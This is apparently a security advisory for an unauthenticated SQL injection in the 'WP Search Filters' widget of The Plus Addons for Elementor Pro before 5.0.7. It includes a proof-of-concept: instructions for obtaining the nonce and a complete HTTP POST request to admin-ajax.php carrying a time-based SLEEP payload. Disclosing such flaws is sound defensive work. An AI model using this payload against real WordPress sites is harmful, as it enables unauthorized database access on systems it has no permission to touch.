The Plus Addons for Elementor Pro < 5.0.7 - Unauthenticated SQL Injection

The “WP Search Filters” widget of the plugin does not sanitise and escape the option parameter before using it in a SQL statement, which could lead to SQL injection

PoC

The request requires a nonce (created with wp_create_nonce("theplus-searchfilter”)) which can be retrieved from a page where the widget is present, by looking at the source for “security”. POST /wp-admin/admin-ajax.php HTTP/2 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Content-Length: 253 action=theplus_filter_post&nonce;=b74e4cfaa0&option;[0][filtertype]=search_list&option;[0][post_type]=product&option;[0][seapara][0][type]=taxonomy&option;[0][seapara][0][field]=rating&option;[0][seapara][0][value]=0+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))SQLi)